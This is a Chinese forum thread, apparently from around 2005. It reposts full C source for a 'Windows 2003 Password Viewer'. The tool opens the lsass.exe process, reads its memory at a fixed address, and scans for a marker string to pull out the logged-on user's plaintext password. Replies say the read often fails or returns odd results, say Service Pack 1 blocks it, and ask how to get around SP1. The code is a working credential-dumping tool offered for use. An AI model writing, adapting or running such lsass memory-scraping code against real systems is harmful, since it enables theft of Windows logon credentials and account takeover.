文章作者：WinEggDrop

复制内容到剪贴板

代码:

//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
//       Used Is Pretty Unwise,But This May Be The Only Way To Review The
//       Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>

#define BaseAddress 0x002b5000      // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char  Password[MAX_PATH] = {0};      // Store The Found Password

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL  FindPassword(DWORD PID);
int  Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL  Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

if (!Is2003())      // Check Out If The Box Is 2003
{
    printf("The Program Can&#39;t Only Run On Windows 2003 Platform\n");
    return -1;
}

PID = GetLsassPID();      // Get The Lsass.exe PID

if (PID == 0)      // Fail To Get PID If Returning Zerom
{
    return -1;
}

FindPassword(PID);      // Find The Password From Lsass.exe Memory
return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:   
//        In: char *Buffer      --> The Memory Buffer To Search   
//       Out: const UINT nSize  --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
//     Since The Password Is Near The Above Location,But It&#39;s Not Always True That
//     We Will Find The Magic String,Or Even We Find It,The Password May Be Located
//     At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
    return -1;
}
for (i = 0 ; i < nSize ; i++)
{
    /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
      Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
      The Magic String,We Have To Do It Manually And Slowly
    */
    if (Buffer[i] == &#39;L&#39;)
    {
      OffSet = 0;
      if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
      {
         OffSet += strlen("LocalSystem") + 1;
         if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
         {
            OffSet += strlen("Remote") + 1;
            if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
            {
              OffSet += strlen("Procedure") + 1;
              if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
              {
                 i += OffSet;
                 break;
              }
            }
         }
      }
    }
}
if (i < nSize)
{
    ZeroMemory(Password,sizeof(Password));
    for (; i < nSize ; i++)
    {
      if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
      {
         /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
         That Way
         */
         j = i + 7;
         for (; j < nSize; j += 2)
         {
            if (Buffer[j] >  0)
            {
              Password[Count++] = Buffer[j];
            }
            else
            {
              break;
            }
         }
         return i + 7;      // One Flag To Indicate We Find The Password
      }
    }
}
return -1;      // Well,We Fail To Find The Password,And This Always Happens
}
// End Search

//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters:  None



[广告]黄金帖间文字广告位招租中 联系QQ：876520（请注明“贴吧广告”）

--------------------------------------------------------------------------------

第3楼 作者： 61.154.221.*** 时间：5-4-26 10:25:00 回复此发言  
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
    printf("Fail To Create Snap Shot\n");
    return 0;
}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32))
{
    CloseHandle(hProcessSnap);    // Must clean up the snapshot object!
    return 0;
}

do
{
  if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
  {
    PID = pe32.th32ProcessID;
    break;
  }
}while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()

//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:  
//        In: DWORD PID      ->      The Lsass.exe&#39;s PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char  Buffer[5 * 1024] = {0};
DWORD  ByteGet = 0;
int   Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID);      // Open Process
if (hProcess == NULL)
{
    printf("Fail To Open Process\n");
    return FALSE;
}

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet))   

// Read The Memory From Lsass.exe
{
    printf("Fail To Read Memory\n");
    CloseHandle(hProcess);
    return FALSE;
}

CloseHandle(hProcess);
  
Found = Search(Buffer,ByteGet);      // Search The Password
if (Found >= 0)      // We May Find The Password
{
    if (strlen(Password) > 0)     

// Yes,We Find The Password Even We Don&#39;t Know If The Password Is Correct Or Not
    {
      printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
    }
}
else
{
    printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword

//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters:  None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
    osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File



windows2003系统的登陆密码可以以明文的方式在进程Lsass.EXE的内存中找到

火狐出的工具

楼主我编译后在2003试了提示内存读取失败呀！

偶用了几次，密码怪怪的，运行一次，下一次密码就变了，看来有点问题

没仔细看，不过代码中好象有广告。。

打了sp1的补丁的..Win2003就不能读了.具体的还不知道为什么哦..改进一下应该可以吧

引用:

这里是引用第[1 楼]的yezhan于2005-07-10 21:13发表的：
windows2003系统的登陆密码可以以明文的方式在进程Lsass.EXE的内存中找到

火狐出的工具

哪里有啊?
关于sp1下的密码
有解决问题的方法没?